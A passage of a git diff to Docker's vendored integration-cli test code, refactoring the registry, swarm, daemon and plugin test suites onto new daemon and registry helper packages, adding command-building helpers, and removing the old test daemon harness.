*DockerSchema1RegistrySuite) TearDownTest(c *check.C) { s.reg.Close() } if s.d != nil { - s.d.Stop() + s.d.Stop(c) } s.ds.TearDownTest(c) } @@ -124,8 +182,8 @@ func init() { type DockerRegistryAuthHtpasswdSuite struct { ds *DockerSuite - reg *testRegistryV2 - d *Daemon + reg *registry.V2 + d *daemon.Daemon } func (s *DockerRegistryAuthHtpasswdSuite) OnTimeout(c *check.C) { @@ -133,9 +191,10 @@ func (s *DockerRegistryAuthHtpasswdSuite) OnTimeout(c *check.C) { } func (s *DockerRegistryAuthHtpasswdSuite) SetUpTest(c *check.C) { - testRequires(c, DaemonIsLinux, RegistryHosting) - s.reg = setupRegistry(c, false, "htpasswd", "") - s.d = NewDaemon(c) + testRequires(c, DaemonIsLinux, RegistryHosting, SameHostDaemon) + s.reg = registry.NewV2(c, registry.Htpasswd) + s.reg.WaitReady(c) + s.d = daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution)) } func (s *DockerRegistryAuthHtpasswdSuite) TearDownTest(c *check.C) { @@ -145,7 +204,7 @@ func (s *DockerRegistryAuthHtpasswdSuite) TearDownTest(c *check.C) { s.reg.Close() } if s.d != nil { - s.d.Stop() + s.d.Stop(c) } s.ds.TearDownTest(c) } @@ -158,8 +217,8 @@ func init() { type DockerRegistryAuthTokenSuite struct { ds *DockerSuite - reg *testRegistryV2 - d *Daemon + reg *registry.V2 + d *daemon.Daemon } func (s *DockerRegistryAuthTokenSuite) OnTimeout(c *check.C) { @@ -167,8 +226,8 @@ func (s *DockerRegistryAuthTokenSuite) OnTimeout(c *check.C) { } func (s *DockerRegistryAuthTokenSuite) SetUpTest(c *check.C) { - testRequires(c, DaemonIsLinux, RegistryHosting) - s.d = NewDaemon(c) + testRequires(c, DaemonIsLinux, RegistryHosting, SameHostDaemon) + s.d = daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution)) } func (s *DockerRegistryAuthTokenSuite) TearDownTest(c *check.C) { @@ -178,7 +237,7 @@ func (s *DockerRegistryAuthTokenSuite) TearDownTest(c *check.C) { s.reg.Close() } if s.d != nil { - s.d.Stop() + s.d.Stop(c) } s.ds.TearDownTest(c) } @@ -187,7 +246,8 @@ 
func (s *DockerRegistryAuthTokenSuite) setupRegistryWithTokenService(c *check.C, if s == nil { c.Fatal("registry suite isn't initialized") } - s.reg = setupRegistry(c, false, "token", tokenURL) + s.reg = registry.NewV2(c, registry.Token(tokenURL)) + s.reg.WaitReady(c) } func init() { @@ -198,7 +258,7 @@ func init() { type DockerDaemonSuite struct { ds *DockerSuite - d *Daemon + d *daemon.Daemon } func (s *DockerDaemonSuite) OnTimeout(c *check.C) { @@ -206,20 +266,20 @@ func (s *DockerDaemonSuite) OnTimeout(c *check.C) { } func (s *DockerDaemonSuite) SetUpTest(c *check.C) { - testRequires(c, DaemonIsLinux) - s.d = NewDaemon(c) + testRequires(c, DaemonIsLinux, SameHostDaemon) + s.d = daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution)) } func (s *DockerDaemonSuite) TearDownTest(c *check.C) { - testRequires(c, DaemonIsLinux) + testRequires(c, DaemonIsLinux, SameHostDaemon) if s.d != nil { - s.d.Stop() + s.d.Stop(c) } s.ds.TearDownTest(c) } func (s *DockerDaemonSuite) TearDownSuite(c *check.C) { - filepath.Walk(daemonSockRoot, func(path string, fi os.FileInfo, err error) error { + filepath.Walk(testdaemon.SockRoot, func(path string, fi os.FileInfo, err error) error { if err != nil { // ignore errors here // not cleaning up sockets is not really an error @@ -230,7 +290,7 @@ func (s *DockerDaemonSuite) TearDownSuite(c *check.C) { } return nil }) - os.RemoveAll(daemonSockRoot) + os.RemoveAll(testdaemon.SockRoot) } const defaultSwarmPort = 2477 @@ -244,7 +304,7 @@ func init() { type DockerSwarmSuite struct { server *httptest.Server ds *DockerSuite - daemons []*SwarmDaemon + daemons []*daemon.Daemon daemonsLock sync.Mutex // protect access to daemons portIndex int } @@ -258,36 +318,22 @@ func (s *DockerSwarmSuite) OnTimeout(c *check.C) { } func (s *DockerSwarmSuite) SetUpTest(c *check.C) { - testRequires(c, DaemonIsLinux) + testRequires(c, DaemonIsLinux, SameHostDaemon) } -func (s *DockerSwarmSuite) AddDaemon(c *check.C, joinSwarm, 
manager bool) *SwarmDaemon { - d := &SwarmDaemon{ - Daemon: NewDaemon(c), - port: defaultSwarmPort + s.portIndex, - } - d.listenAddr = fmt.Sprintf("0.0.0.0:%d", d.port) - args := []string{"--iptables=false", "--swarm-default-advertise-addr=lo"} // avoid networking conflicts - if experimentalDaemon { - args = append(args, "--experimental") - } - err := d.StartWithBusybox(args...) - c.Assert(err, check.IsNil) - - if joinSwarm == true { +func (s *DockerSwarmSuite) AddDaemon(c *check.C, joinSwarm, manager bool) *daemon.Daemon { + d := daemon.New(c, dockerBinary, dockerdBinary, + testdaemon.WithEnvironment(testEnv.Execution), + testdaemon.WithSwarmPort(defaultSwarmPort+s.portIndex), + ) + if joinSwarm { if len(s.daemons) > 0 { - tokens := s.daemons[0].joinTokens(c) - token := tokens.Worker - if manager { - token = tokens.Manager - } - c.Assert(d.Join(swarm.JoinRequest{ - RemoteAddrs: []string{s.daemons[0].listenAddr}, - JoinToken: token, - }), check.IsNil) + d.StartAndSwarmJoin(c, s.daemons[0].Daemon, manager) } else { - c.Assert(d.Init(swarm.InitRequest{}), check.IsNil) + d.StartAndSwarmInit(c) } + } else { + d.StartWithBusybox(c, "--iptables=false", "--swarm-default-advertise-addr=lo") } s.portIndex++ @@ -302,14 +348,10 @@ func (s *DockerSwarmSuite) TearDownTest(c *check.C) { testRequires(c, DaemonIsLinux) s.daemonsLock.Lock() for _, d := range s.daemons { - d.Stop() - // raft state file is quite big (64MB) so remove it after every test - walDir := filepath.Join(d.root, "swarm/raft/wal") - if err := os.RemoveAll(walDir); err != nil { - c.Logf("error removing %v: %v", walDir, err) + if d != nil { + d.Stop(c) + d.Cleanup(c) } - - cleanupExecRoot(c, d.execRoot) } s.daemons = nil s.daemonsLock.Unlock() @@ -319,65 +361,49 @@ func (s *DockerSwarmSuite) TearDownTest(c *check.C) { } func init() { - check.Suite(&DockerTrustSuite{ + check.Suite(&DockerPluginSuite{ ds: &DockerSuite{}, }) } -type DockerTrustSuite struct { - ds *DockerSuite - reg *testRegistryV2 - not *testNotary 
+type DockerPluginSuite struct { + ds *DockerSuite + registry *registry.V2 } -func (s *DockerTrustSuite) SetUpTest(c *check.C) { - testRequires(c, RegistryHosting, NotaryServerHosting) - s.reg = setupRegistry(c, false, "", "") - s.not = setupNotary(c) +func (ps *DockerPluginSuite) registryHost() string { + return privateRegistryURL } -func (s *DockerTrustSuite) TearDownTest(c *check.C) { - if s.reg != nil { - s.reg.Close() - } - if s.not != nil { - s.not.Close() - } - - // Remove trusted keys and metadata after test - os.RemoveAll(filepath.Join(cliconfig.ConfigDir(), "trust")) - s.ds.TearDownTest(c) +func (ps *DockerPluginSuite) getPluginRepo() string { + return path.Join(ps.registryHost(), "plugin", "basic") } - -func init() { - ds := &DockerSuite{} - check.Suite(&DockerTrustedSwarmSuite{ - trustSuite: DockerTrustSuite{ - ds: ds, - }, - swarmSuite: DockerSwarmSuite{ - ds: ds, - }, - }) +func (ps *DockerPluginSuite) getPluginRepoWithTag() string { + return ps.getPluginRepo() + ":" + "latest" } -type DockerTrustedSwarmSuite struct { - swarmSuite DockerSwarmSuite - trustSuite DockerTrustSuite - reg *testRegistryV2 - not *testNotary +func (ps *DockerPluginSuite) SetUpSuite(c *check.C) { + testRequires(c, DaemonIsLinux, RegistryHosting) + ps.registry = registry.NewV2(c) + ps.registry.WaitReady(c) + + ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second) + defer cancel() + + err := plugin.CreateInRegistry(ctx, ps.getPluginRepo(), nil) + c.Assert(err, checker.IsNil, check.Commentf("failed to create plugin")) } -func (s *DockerTrustedSwarmSuite) SetUpTest(c *check.C) { - s.swarmSuite.SetUpTest(c) - s.trustSuite.SetUpTest(c) +func (ps *DockerPluginSuite) TearDownSuite(c *check.C) { + if ps.registry != nil { + ps.registry.Close() + } } -func (s *DockerTrustedSwarmSuite) TearDownTest(c *check.C) { - s.trustSuite.TearDownTest(c) - s.swarmSuite.TearDownTest(c) +func (ps *DockerPluginSuite) TearDownTest(c *check.C) { + ps.ds.TearDownTest(c) } -func (s 
*DockerTrustedSwarmSuite) OnTimeout(c *check.C) { - s.swarmSuite.OnTimeout(c) +func (ps *DockerPluginSuite) OnTimeout(c *check.C) { + ps.ds.OnTimeout(c) } diff --git a/vendor/github.com/docker/docker/pkg/integration/checker/checker.go b/vendor/github.com/docker/docker/integration-cli/checker/checker.go similarity index 95% rename from vendor/github.com/docker/docker/pkg/integration/checker/checker.go rename to vendor/github.com/docker/docker/integration-cli/checker/checker.go index d1b703a599..d7fdc412ba 100644 --- a/vendor/github.com/docker/docker/pkg/integration/checker/checker.go +++ b/vendor/github.com/docker/docker/integration-cli/checker/checker.go @@ -1,5 +1,5 @@ // Package checker provides Docker specific implementations of the go-check.Checker interface. -package checker +package checker // import "github.com/docker/docker/integration-cli/checker" import ( "github.com/go-check/check" diff --git a/vendor/github.com/docker/docker/integration-cli/cli/build/build.go b/vendor/github.com/docker/docker/integration-cli/cli/build/build.go new file mode 100644 index 0000000000..0b10ea79f8 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/cli/build/build.go @@ -0,0 +1,82 @@ +package build // import "github.com/docker/docker/integration-cli/cli/build" + +import ( + "io" + "strings" + + "github.com/docker/docker/internal/test/fakecontext" + "gotest.tools/icmd" +) + +type testingT interface { + Fatal(args ...interface{}) + Fatalf(string, ...interface{}) +} + +// WithStdinContext sets the build context from the standard input with the specified reader +func WithStdinContext(closer io.ReadCloser) func(*icmd.Cmd) func() { + return func(cmd *icmd.Cmd) func() { + cmd.Command = append(cmd.Command, "-") + cmd.Stdin = closer + return func() { + // FIXME(vdemeester) we should not ignore the error here… + closer.Close() + } + } +} + +// WithDockerfile creates / returns a CmdOperator to set the Dockerfile for a build operation +func WithDockerfile(dockerfile 
string) func(*icmd.Cmd) func() { + return func(cmd *icmd.Cmd) func() { + cmd.Command = append(cmd.Command, "-") + cmd.Stdin = strings.NewReader(dockerfile) + return nil + } +} + +// WithoutCache makes the build ignore cache +func WithoutCache(cmd *icmd.Cmd) func() { + cmd.Command = append(cmd.Command, "--no-cache") + return nil +} + +// WithContextPath sets the build context path +func WithContextPath(path string) func(*icmd.Cmd) func() { + return func(cmd *icmd.Cmd) func() { + cmd.Command = append(cmd.Command, path) + return nil + } +} + +// WithExternalBuildContext use the specified context as build context +func WithExternalBuildContext(ctx *fakecontext.Fake) func(*icmd.Cmd) func() { + return func(cmd *icmd.Cmd) func() { + cmd.Dir = ctx.Dir + cmd.Command = append(cmd.Command, ".") + return nil + } +} + +// WithBuildContext sets up the build context +func WithBuildContext(t testingT, contextOperators ...func(*fakecontext.Fake) error) func(*icmd.Cmd) func() { + // FIXME(vdemeester) de-duplicate that + ctx := fakecontext.New(t, "", contextOperators...) 
+ return func(cmd *icmd.Cmd) func() { + cmd.Dir = ctx.Dir + cmd.Command = append(cmd.Command, ".") + return closeBuildContext(t, ctx) + } +} + +// WithFile adds the specified file (with content) in the build context +func WithFile(name, content string) func(*fakecontext.Fake) error { + return fakecontext.WithFile(name, content) +} + +func closeBuildContext(t testingT, ctx *fakecontext.Fake) func() { + return func() { + if err := ctx.Close(); err != nil { + t.Fatal(err) + } + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/cli/cli.go b/vendor/github.com/docker/docker/integration-cli/cli/cli.go new file mode 100644 index 0000000000..bc3f3c194e --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/cli/cli.go @@ -0,0 +1,226 @@ +package cli // import "github.com/docker/docker/integration-cli/cli" + +import ( + "fmt" + "io" + "strings" + "time" + + "github.com/docker/docker/integration-cli/daemon" + "github.com/docker/docker/integration-cli/environment" + "github.com/pkg/errors" + "gotest.tools/assert" + "gotest.tools/icmd" +) + +var testEnv *environment.Execution + +// SetTestEnvironment sets a static test environment +// TODO: decouple this package from environment +func SetTestEnvironment(env *environment.Execution) { + testEnv = env +} + +// CmdOperator defines functions that can modify a command +type CmdOperator func(*icmd.Cmd) func() + +type testingT interface { + assert.TestingT + Fatal(args ...interface{}) + Fatalf(string, ...interface{}) +} + +// DockerCmd executes the specified docker command and expect a success +func DockerCmd(t testingT, args ...string) *icmd.Result { + return Docker(Args(args...)).Assert(t, icmd.Success) +} + +// BuildCmd executes the specified docker build command and expect a success +func BuildCmd(t testingT, name string, cmdOperators ...CmdOperator) *icmd.Result { + return Docker(Build(name), cmdOperators...).Assert(t, icmd.Success) +} + +// InspectCmd executes the specified docker inspect command and 
expect a success +func InspectCmd(t testingT, name string, cmdOperators ...CmdOperator) *icmd.Result { + return Docker(Inspect(name), cmdOperators...).Assert(t, icmd.Success) +} + +// WaitRun will wait for the specified container to be running, maximum 5 seconds. +func WaitRun(t testingT, name string, cmdOperators ...CmdOperator) { + WaitForInspectResult(t, name, "{{.State.Running}}", "true", 5*time.Second, cmdOperators...) +} + +// WaitExited will wait for the specified container to state exit, subject +// to a maximum time limit in seconds supplied by the caller +func WaitExited(t testingT, name string, timeout time.Duration, cmdOperators ...CmdOperator) { + WaitForInspectResult(t, name, "{{.State.Status}}", "exited", timeout, cmdOperators...) +} + +// WaitRestart will wait for the specified container to restart once +func WaitRestart(t testingT, name string, timeout time.Duration, cmdOperators ...CmdOperator) { + WaitForInspectResult(t, name, "{{.RestartCount}}", "1", timeout, cmdOperators...) +} + +// WaitForInspectResult waits for the specified expression to be equals to the specified expected string in the given time. +func WaitForInspectResult(t testingT, name, expr, expected string, timeout time.Duration, cmdOperators ...CmdOperator) { + after := time.After(timeout) + + args := []string{"inspect", "-f", expr, name} + for { + result := Docker(Args(args...), cmdOperators...) 
+ if result.Error != nil { + if !strings.Contains(strings.ToLower(result.Stderr()), "no such") { + t.Fatalf("error executing docker inspect: %v\n%s", + result.Stderr(), result.Stdout()) + } + select { + case <-after: + t.Fatal(result.Error) + default: + time.Sleep(10 * time.Millisecond) + continue + } + } + + out := strings.TrimSpace(result.Stdout()) + if out == expected { + break + } + + select { + case <-after: + t.Fatalf("condition \"%q == %q\" not true in time (%v)", out, expected, timeout) + default: + } + + time.Sleep(100 * time.Millisecond) + } +} + +// Docker executes the specified docker command +func Docker(cmd icmd.Cmd, cmdOperators ...CmdOperator) *icmd.Result { + for _, op := range cmdOperators { + deferFn := op(&cmd) + if deferFn != nil { + defer deferFn() + } + } + appendDocker(&cmd) + if err := validateArgs(cmd.Command...); err != nil { + return &icmd.Result{ + Error: err, + } + } + return icmd.RunCmd(cmd) +} + +// validateArgs is a checker to ensure tests are not running commands which are +// not supported on platforms. Specifically on Windows this is 'busybox top'. +func validateArgs(args ...string) error { + if testEnv.OSType != "windows" { + return nil + } + foundBusybox := -1 + for key, value := range args { + if strings.ToLower(value) == "busybox" { + foundBusybox = key + } + if (foundBusybox != -1) && (key == foundBusybox+1) && (strings.ToLower(value) == "top") { + return errors.New("cannot use 'busybox top' in tests on Windows. 
Use runSleepingContainer()") + } + } + return nil +} + +// Build executes the specified docker build command +func Build(name string) icmd.Cmd { + return icmd.Command("build", "-t", name) +} + +// Inspect executes the specified docker inspect command +func Inspect(name string) icmd.Cmd { + return icmd.Command("inspect", name) +} + +// Format sets the specified format with --format flag +func Format(format string) func(*icmd.Cmd) func() { + return func(cmd *icmd.Cmd) func() { + cmd.Command = append( + []string{cmd.Command[0]}, + append([]string{"--format", fmt.Sprintf("{{%s}}", format)}, cmd.Command[1:]...)..., + ) + return nil + } +} + +func appendDocker(cmd *icmd.Cmd) { + cmd.Command = append([]string{testEnv.DockerBinary()}, cmd.Command...) +} + +// Args build an icmd.Cmd struct from the specified arguments +func Args(args ...string) icmd.Cmd { + switch len(args) { + case 0: + return icmd.Cmd{} + case 1: + return icmd.Command(args[0]) + default: + return icmd.Command(args[0], args[1:]...) + } +} + +// Daemon points to the specified daemon +func Daemon(d *daemon.Daemon) func(*icmd.Cmd) func() { + return func(cmd *icmd.Cmd) func() { + cmd.Command = append([]string{"--host", d.Sock()}, cmd.Command...) + return nil + } +} + +// WithTimeout sets the timeout for the command to run +func WithTimeout(timeout time.Duration) func(cmd *icmd.Cmd) func() { + return func(cmd *icmd.Cmd) func() { + cmd.Timeout = timeout + return nil + } +} + +// WithEnvironmentVariables sets the specified environment variables for the command to run +func WithEnvironmentVariables(envs ...string) func(cmd *icmd.Cmd) func() { + return func(cmd *icmd.Cmd) func() { + cmd.Env = envs + return nil + } +} + +// WithFlags sets the specified flags for the command to run +func WithFlags(flags ...string) func(*icmd.Cmd) func() { + return func(cmd *icmd.Cmd) func() { + cmd.Command = append(cmd.Command, flags...) 
+ return nil + } +} + +// InDir sets the folder in which the command should be executed +func InDir(path string) func(*icmd.Cmd) func() { + return func(cmd *icmd.Cmd) func() { + cmd.Dir = path + return nil + } +} + +// WithStdout sets the standard output writer of the command +func WithStdout(writer io.Writer) func(*icmd.Cmd) func() { + return func(cmd *icmd.Cmd) func() { + cmd.Stdout = writer + return nil + } +} + +// WithStdin sets the standard input reader for the command +func WithStdin(stdin io.Reader) func(*icmd.Cmd) func() { + return func(cmd *icmd.Cmd) func() { + cmd.Stdin = stdin + return nil + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/daemon.go b/vendor/github.com/docker/docker/integration-cli/daemon.go deleted file mode 100644 index 9fd3f1e82d..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/daemon.go +++ /dev/null @@ -1,608 +0,0 @@ -package main - -import ( - "bytes" - "encoding/json" - "errors" - "fmt" - "io" - "net/http" - "os" - "os/exec" - "path/filepath" - "strconv" - "strings" - "time" - - "github.com/docker/docker/api/types/events" - "github.com/docker/docker/opts" - "github.com/docker/docker/pkg/integration/checker" - "github.com/docker/docker/pkg/ioutils" - "github.com/docker/docker/pkg/stringid" - "github.com/docker/go-connections/sockets" - "github.com/docker/go-connections/tlsconfig" - "github.com/go-check/check" -) - -var daemonSockRoot = filepath.Join(os.TempDir(), "docker-integration") - -// Daemon represents a Docker daemon for the testing framework. 
-type Daemon struct { - GlobalFlags []string - - id string - c *check.C - logFile *os.File - folder string - root string - stdin io.WriteCloser - stdout, stderr io.ReadCloser - cmd *exec.Cmd - storageDriver string - wait chan error - userlandProxy bool - useDefaultHost bool - useDefaultTLSHost bool - execRoot string -} - -type clientConfig struct { - transport *http.Transport - scheme string - addr string -} - -// NewDaemon returns a Daemon instance to be used for testing. -// This will create a directory such as d123456789 in the folder specified by $DEST. -// The daemon will not automatically start. -func NewDaemon(c *check.C) *Daemon { - dest := os.Getenv("DEST") - c.Assert(dest, check.Not(check.Equals), "", check.Commentf("Please set the DEST environment variable")) - - err := os.MkdirAll(daemonSockRoot, 0700) - c.Assert(err, checker.IsNil, check.Commentf("could not create daemon socket root")) - - id := fmt.Sprintf("d%s", stringid.TruncateID(stringid.GenerateRandomID())) - dir := filepath.Join(dest, id) - daemonFolder, err := filepath.Abs(dir) - c.Assert(err, check.IsNil, check.Commentf("Could not make %q an absolute path", dir)) - daemonRoot := filepath.Join(daemonFolder, "root") - - c.Assert(os.MkdirAll(daemonRoot, 0755), check.IsNil, check.Commentf("Could not create daemon root %q", dir)) - - userlandProxy := true - if env := os.Getenv("DOCKER_USERLANDPROXY"); env != "" { - if val, err := strconv.ParseBool(env); err != nil { - userlandProxy = val - } - } - - return &Daemon{ - id: id, - c: c, - folder: daemonFolder, - root: daemonRoot, - storageDriver: os.Getenv("DOCKER_GRAPHDRIVER"), - userlandProxy: userlandProxy, - execRoot: filepath.Join(os.TempDir(), "docker-execroot", id), - } -} - -// RootDir returns the root directory of the daemon. 
-func (d *Daemon) RootDir() string { - return d.root -} - -func (d *Daemon) getClientConfig() (*clientConfig, error) { - var ( - transport *http.Transport - scheme string - addr string - proto string - ) - if d.useDefaultTLSHost { - option := &tlsconfig.Options{ - CAFile: "fixtures/https/ca.pem", - CertFile: "fixtures/https/client-cert.pem", - KeyFile: "fixtures/https/client-key.pem", - } - tlsConfig, err := tlsconfig.Client(*option) - if err != nil { - return nil, err - } - transport = &http.Transport{ - TLSClientConfig: tlsConfig, - } - addr = fmt.Sprintf("%s:%d", opts.DefaultHTTPHost, opts.DefaultTLSHTTPPort) - scheme = "https" - proto = "tcp" - } else if d.useDefaultHost { - addr = opts.DefaultUnixSocket - proto = "unix" - scheme = "http" - transport = &http.Transport{} - } else { - addr = d.sockPath() - proto = "unix" - scheme = "http" - transport = &http.Transport{} - } - - d.c.Assert(sockets.ConfigureTransport(transport, proto, addr), check.IsNil) - - return &clientConfig{ - transport: transport, - scheme: scheme, - addr: addr, - }, nil -} - -// Start will start the daemon and return once it is ready to receive requests. -// You can specify additional daemon flags. -func (d *Daemon) Start(args ...string) error { - logFile, err := os.OpenFile(filepath.Join(d.folder, "docker.log"), os.O_RDWR|os.O_CREATE|os.O_APPEND, 0600) - d.c.Assert(err, check.IsNil, check.Commentf("[%s] Could not create %s/docker.log", d.id, d.folder)) - - return d.StartWithLogFile(logFile, args...) -} - -// StartWithLogFile will start the daemon and attach its streams to a given file. 
-func (d *Daemon) StartWithLogFile(out *os.File, providedArgs ...string) error { - dockerdBinary, err := exec.LookPath(dockerdBinary) - d.c.Assert(err, check.IsNil, check.Commentf("[%s] could not find docker binary in $PATH", d.id)) - - args := append(d.GlobalFlags, - "--containerd", "/var/run/docker/libcontainerd/docker-containerd.sock", - "--graph", d.root, - "--exec-root", d.execRoot, - "--pidfile", fmt.Sprintf("%s/docker.pid", d.folder), - fmt.Sprintf("--userland-proxy=%t", d.userlandProxy), - ) - if experimentalDaemon { - args = append(args, "--experimental", "--init") - } - if !(d.useDefaultHost || d.useDefaultTLSHost) { - args = append(args, []string{"--host", d.sock()}...) - } - if root := os.Getenv("DOCKER_REMAP_ROOT"); root != "" { - args = append(args, []string{"--userns-remap", root}...) - } - - // If we don't explicitly set the log-level or debug flag(-D) then - // turn on debug mode - foundLog := false - foundSd := false - for _, a := range providedArgs { - if strings.Contains(a, "--log-level") || strings.Contains(a, "-D") || strings.Contains(a, "--debug") { - foundLog = true - } - if strings.Contains(a, "--storage-driver") { - foundSd = true - } - } - if !foundLog { - args = append(args, "--debug") - } - if d.storageDriver != "" && !foundSd { - args = append(args, "--storage-driver", d.storageDriver) - } - - args = append(args, providedArgs...) - d.cmd = exec.Command(dockerdBinary, args...) 
- d.cmd.Env = append(os.Environ(), "DOCKER_SERVICE_PREFER_OFFLINE_IMAGE=1") - d.cmd.Stdout = out - d.cmd.Stderr = out - d.logFile = out - - if err := d.cmd.Start(); err != nil { - return fmt.Errorf("[%s] could not start daemon container: %v", d.id, err) - } - - wait := make(chan error) - - go func() { - wait <- d.cmd.Wait() - d.c.Logf("[%s] exiting daemon", d.id) - close(wait) - }() - - d.wait = wait - - tick := time.Tick(500 * time.Millisecond) - // make sure daemon is ready to receive requests - startTime := time.Now().Unix() - for { - d.c.Logf("[%s] waiting for daemon to start", d.id) - if time.Now().Unix()-startTime > 5 { - // After 5 seconds, give up - return fmt.Errorf("[%s] Daemon exited and never started", d.id) - } - select { - case <-time.After(2 * time.Second): - return fmt.Errorf("[%s] timeout: daemon does not respond", d.id) - case <-tick: - clientConfig, err := d.getClientConfig() - if err != nil { - return err - } - - client := &http.Client{ - Transport: clientConfig.transport, - } - - req, err := http.NewRequest("GET", "/_ping", nil) - d.c.Assert(err, check.IsNil, check.Commentf("[%s] could not create new request", d.id)) - req.URL.Host = clientConfig.addr - req.URL.Scheme = clientConfig.scheme - resp, err := client.Do(req) - if err != nil { - continue - } - if resp.StatusCode != http.StatusOK { - d.c.Logf("[%s] received status != 200 OK: %s", d.id, resp.Status) - } - d.c.Logf("[%s] daemon started", d.id) - d.root, err = d.queryRootDir() - if err != nil { - return fmt.Errorf("[%s] error querying daemon for root directory: %v", d.id, err) - } - return nil - case <-d.wait: - return fmt.Errorf("[%s] Daemon exited during startup", d.id) - } - } -} - -// StartWithBusybox will first start the daemon with Daemon.Start() -// then save the busybox image from the main daemon and load it into this Daemon instance. 
-func (d *Daemon) StartWithBusybox(arg ...string) error { - if err := d.Start(arg...); err != nil { - return err - } - return d.LoadBusybox() -} - -// Kill will send a SIGKILL to the daemon -func (d *Daemon) Kill() error { - if d.cmd == nil || d.wait == nil { - return errors.New("daemon not started") - } - - defer func() { - d.logFile.Close() - d.cmd = nil - }() - - if err := d.cmd.Process.Kill(); err != nil { - d.c.Logf("Could not kill daemon: %v", err) - return err - } - - if err := os.Remove(fmt.Sprintf("%s/docker.pid", d.folder)); err != nil { - return err - } - - return nil -} - -// DumpStackAndQuit sends SIGQUIT to the daemon, which triggers it to dump its -// stack to its log file and exit -// This is used primarily for gathering debug information on test timeout -func (d *Daemon) DumpStackAndQuit() { - if d.cmd == nil || d.cmd.Process == nil { - return - } - signalDaemonDump(d.cmd.Process.Pid) -} - -// Stop will send a SIGINT every second and wait for the daemon to stop. -// If it timeouts, a SIGKILL is sent. -// Stop will not delete the daemon directory. If a purged daemon is needed, -// instantiate a new one with NewDaemon. 
-func (d *Daemon) Stop() error { - if d.cmd == nil || d.wait == nil { - return errors.New("daemon not started") - } - - defer func() { - d.logFile.Close() - d.cmd = nil - }() - - i := 1 - tick := time.Tick(time.Second) - - if err := d.cmd.Process.Signal(os.Interrupt); err != nil { - return fmt.Errorf("could not send signal: %v", err) - } -out1: - for { - select { - case err := <-d.wait: - return err - case <-time.After(20 * time.Second): - // time for stopping jobs and run onShutdown hooks - d.c.Logf("timeout: %v", d.id) - break out1 - } - } - -out2: - for { - select { - case err := <-d.wait: - return err - case <-tick: - i++ - if i > 5 { - d.c.Logf("tried to interrupt daemon for %d times, now try to kill it", i) - break out2 - } - d.c.Logf("Attempt #%d: daemon is still running with pid %d", i, d.cmd.Process.Pid) - if err := d.cmd.Process.Signal(os.Interrupt); err != nil { - return fmt.Errorf("could not send signal: %v", err) - } - } - } - - if err := d.cmd.Process.Kill(); err != nil { - d.c.Logf("Could not kill daemon: %v", err) - return err - } - - if err := os.Remove(fmt.Sprintf("%s/docker.pid", d.folder)); err != nil { - return err - } - - return nil -} - -// Restart will restart the daemon by first stopping it and then starting it. -func (d *Daemon) Restart(arg ...string) error { - d.Stop() - // in the case of tests running a user namespace-enabled daemon, we have resolved - // d.root to be the actual final path of the graph dir after the "uid.gid" of - // remapped root is added--we need to subtract it from the path before calling - // start or else we will continue making subdirectories rather than truly restarting - // with the same location/root: - if root := os.Getenv("DOCKER_REMAP_ROOT"); root != "" { - d.root = filepath.Dir(d.root) - } - return d.Start(arg...) 
-} - -// LoadBusybox will load the stored busybox into a newly started daemon -func (d *Daemon) LoadBusybox() error { - bb := filepath.Join(d.folder, "busybox.tar") - if _, err := os.Stat(bb); err != nil { - if !os.IsNotExist(err) { - return fmt.Errorf("unexpected error on busybox.tar stat: %v", err) - } - // saving busybox image from main daemon - if out, err := exec.Command(dockerBinary, "save", "--output", bb, "busybox:latest").CombinedOutput(); err != nil { - imagesOut, _ := exec.Command(dockerBinary, "images", "--format", "{{ .Repository }}:{{ .Tag }}").CombinedOutput() - return fmt.Errorf("could not save busybox image: %s\n%s", string(out), strings.TrimSpace(string(imagesOut))) - } - } - // loading busybox image to this daemon - if out, err := d.Cmd("load", "--input", bb); err != nil { - return fmt.Errorf("could not load busybox image: %s", out) - } - if err := os.Remove(bb); err != nil { - d.c.Logf("could not remove %s: %v", bb, err) - } - return nil -} - -func (d *Daemon) queryRootDir() (string, error) { - // update daemon root by asking /info endpoint (to support user - // namespaced daemon with root remapped uid.gid directory) - clientConfig, err := d.getClientConfig() - if err != nil { - return "", err - } - - client := &http.Client{ - Transport: clientConfig.transport, - } - - req, err := http.NewRequest("GET", "/info", nil) - if err != nil { - return "", err - } - req.Header.Set("Content-Type", "application/json") - req.URL.Host = clientConfig.addr - req.URL.Scheme = clientConfig.scheme - - resp, err := client.Do(req) - if err != nil { - return "", err - } - body := ioutils.NewReadCloserWrapper(resp.Body, func() error { - return resp.Body.Close() - }) - - type Info struct { - DockerRootDir string - } - var b []byte - var i Info - b, err = readBody(body) - if err == nil && resp.StatusCode == http.StatusOK { - // read the docker root dir - if err = json.Unmarshal(b, &i); err == nil { - return i.DockerRootDir, nil - } - } - return "", err -} - -func (d 
*Daemon) sock() string { - return fmt.Sprintf("unix://" + d.sockPath()) -} - -func (d *Daemon) sockPath() string { - return filepath.Join(daemonSockRoot, d.id+".sock") -} - -func (d *Daemon) waitRun(contID string) error { - args := []string{"--host", d.sock()} - return waitInspectWithArgs(contID, "{{.State.Running}}", "true", 10*time.Second, args...) -} - -func (d *Daemon) getBaseDeviceSize(c *check.C) int64 { - infoCmdOutput, _, err := runCommandPipelineWithOutput( - exec.Command(dockerBinary, "-H", d.sock(), "info"), - exec.Command("grep", "Base Device Size"), - ) - c.Assert(err, checker.IsNil) - basesizeSlice := strings.Split(infoCmdOutput, ":") - basesize := strings.Trim(basesizeSlice[1], " ") - basesize = strings.Trim(basesize, "\n")[:len(basesize)-3] - basesizeFloat, err := strconv.ParseFloat(strings.Trim(basesize, " "), 64) - c.Assert(err, checker.IsNil) - basesizeBytes := int64(basesizeFloat) * (1024 * 1024 * 1024) - return basesizeBytes -} - -// Cmd will execute a docker CLI command against this Daemon. -// Example: d.Cmd("version") will run docker -H unix://path/to/unix.sock version -func (d *Daemon) Cmd(args ...string) (string, error) { - b, err := d.command(args...).CombinedOutput() - return string(b), err -} - -func (d *Daemon) command(args ...string) *exec.Cmd { - return exec.Command(dockerBinary, d.prependHostArg(args)...) -} - -func (d *Daemon) 